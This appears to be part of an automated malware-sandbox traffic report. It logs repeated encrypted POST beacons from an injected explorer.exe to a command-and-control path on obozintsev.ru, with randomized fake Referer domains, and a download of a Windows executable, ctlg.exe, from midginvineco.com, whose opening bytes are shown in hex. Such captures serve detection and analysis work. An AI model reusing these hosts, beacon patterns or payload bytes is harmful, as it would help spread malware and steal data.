                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        49192.168.2.449937189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:14:07.375758886 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://gsuntxougdhs.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 265
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:14:07.375781059 CET265OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 24 6b 2c 90 f5 76 0b 75 72 01 db ff
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[$k,vurMIDpp$~B&l*#`?L?*tGLfNHgHY<\z4*1#8)/RC8~9gC?Y)h
                                                                                                                        Nov 30, 2024 11:14:09.165790081 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:08 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        50192.168.2.449941189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:14:09.295814037 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://unxnurhhgcwb.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 157
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:14:09.295829058 CET157OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 25 6b 2c 90 f5 76 0b 75 26 15 da e4
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[%k,vu&,ybopTmw]^2=X_<S`e!rw%
                                                                                                                        Nov 30, 2024 11:14:11.135932922 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:10 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        51192.168.2.449946189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:14:11.306545019 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://cvixokerumeto.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 158
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:14:11.306545019 CET158OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3a 6b 2c 90 f5 76 0b 75 62 3b b5 bd
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[:k,vub;`vz{86Vog3e>c\IVt,yu<-4
                                                                                                                        Nov 30, 2024 11:14:13.296889067 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:12 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        52192.168.2.449953189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:14:13.426032066 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://fsnaumbblcik.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 228
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:14:13.426074028 CET228OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3b 6b 2c 90 f5 76 0b 75 7b 0d d6 87
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[;k,vu{_?bf:/P1mOw&8z=kO'Z|N Q}Q+/R"^:J"!v5AuT,(Jo
                                                                                                                        Nov 30, 2024 11:14:15.211502075 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:14 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        53192.168.2.449959189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:14:15.336947918 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://uwalktmlxvraf.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 149
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:14:15.336958885 CET149OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 38 6b 2c 90 f5 76 0b 75 5b 0a b7 a8
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[8k,vu[XFwMwLx1hs5eIF(dRK1l$7F4Ti4*
                                                                                                                        Nov 30, 2024 11:14:17.129673004 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:16 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        54192.168.2.450061123.213.233.131802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:15:27.765614033 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://omlavaayevr.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 281
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:15:27.765676975 CET281OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 09 c1 90
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA .[k,vu?x6jS_f1f$q9'wQ[G=[{&EdG-^b8ge?pPY ?73)Bqd`_ga~8P%
                                                                                                                        Nov 30, 2024 11:15:29.907083035 CET151INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:15:29 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                                        Data Ascii: r


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        55192.168.2.450062123.213.233.131802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:15:37.719506025 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://iopuyoenyjytdheg.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 112
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:15:37.719540119 CET112OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 1c db ed
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA .[k,vuXuag&S&>X
                                                                                                                        Nov 30, 2024 11:15:39.773937941 CET151INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:15:39 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                                        Data Ascii: r


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        56192.168.2.450065123.213.233.131802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:15:48.782426119 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://xajywliqqhjs.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 114
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:15:48.782447100 CET114OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 08 d8 91
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA .[k,vuJiHkCj7+Iw:0@
                                                                                                                        Nov 30, 2024 11:15:50.871936083 CET151INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:15:50 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                                        Data Ascii: r


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        57192.168.2.450066123.213.233.131802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:16:00.614301920 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://cjnppqrvkvd.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 347
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:16:00.614326000 CET347OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 4e e5 aa
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA .[k,vu7Ns'zR(T))(*hmwF<j$0WPK0t1 "c'Eqa{Ho9gv7,(@+b^=
                                                                                                                        Nov 30, 2024 11:16:02.791148901 CET151INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:16:02 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                                        Data Ascii: r


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.44979123.145.40.1814432580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-30 10:13:12 UTC167OUTGET /prog/ctlg.exe HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Host: midginvineco.com
                                                                                                                        2024-11-30 10:13:12 UTC327INHTTP/1.1 200 OK
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:12 GMT
                                                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Last-Modified: Sat, 30 Nov 2024 10:00:02 GMT
                                                                                                                        ETag: "2fe00-6281e610d494f"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 196096
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                        2024-11-30 10:13:12 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 a5 8c 4e 52 c4 e2 1d 52 c4 e2 1d 52 c4 e2 1d 4c 96 66 1d 49 c4 e2 1d 4c 96 77 1d 43 c4 e2 1d 4c 96 61 1d 0f c4 e2 1d 75 02 99 1d 55 c4 e2 1d 52 c4 e3 1d 2b c4 e2 1d 4c 96 68 1d 53 c4 e2 1d 4c 96 76 1d 53 c4 e2 1d 4c 96 73 1d 53 c4 e2 1d 52 69 63 68 52 c4 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 85 88 53 66 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NRRRLfILwCLauUR+LhSLvSLsSRichRPELSf
